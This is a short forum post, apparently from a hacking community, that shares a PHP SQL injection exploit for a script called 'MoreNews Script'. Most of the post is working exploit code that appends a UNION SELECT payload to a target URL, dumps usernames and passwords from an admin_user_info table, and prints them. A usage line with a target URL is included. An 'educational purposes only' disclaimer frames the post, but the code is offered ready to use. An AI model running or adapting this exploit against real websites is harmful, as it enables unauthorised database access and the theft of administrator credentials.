SQL Injection Exploit [PHP]

Hello HC,
I made an SQL Injection exploit in PHP (for educational purposes only).
This is an example of how a remote exploit works.
Vulnerability was belong to "MoreNews Script" but It's patched now so use it for just educational purposes.

Usage:

Code: SELECT ALL 
http://localhost/script.php?web=http://targetsite.com/page.php?param=

Sauce:
PHP Code: SELECT ALL 
<?phperror_reporting(0);print&nbsp;"<h2>HackCommunity&nbsp;SQL&nbsp;Injection&nbsp;Exploit</h2>";if(!empty($_GET['web'])){print&nbsp;"<b>Scanning&nbsp;the&nbsp;vulnerability...</b><br>________________________________<br>";$injquery&nbsp;=&nbsp;"null%20UNION%20SELECT%20concat_ws(0x3c68633e%2Cusername%2C0x3a%2C0x3a%2Cuserpass​​%2C0x3c2f68633e)%20from%20admin_user_info";$source&nbsp;=&nbsp;file_get_contents($_GET['web']&nbsp;.&nbsp;$injquery);if(strstr($source,&nbsp;"<hc>")){$info&nbsp;=&nbsp;substr($source,&nbsp;strrpos($source,&nbsp;'<hc>'),&nbsp;strpos($source,&nbsp;'</hc>')&nbsp;-&nbsp;strrpos($source,&nbsp;'<hc>'));print&nbsp;"Vulnerability&nbsp;Exploit&nbsp;Successfull!<br><br>Result&nbsp;=>&nbsp;$info";}else{print&nbsp;"Vulnerability&nbsp;Not&nbsp;Avaible&nbsp;For&nbsp;This&nbsp;Website..<br>";}}else{print&nbsp;"Please&nbsp;Enter&nbsp;an&nbsp;URL&nbsp;(ex:&nbsp;http://site.com/page.php?parameter=&nbspWink<br>";}?>

Image:


Au Revoir..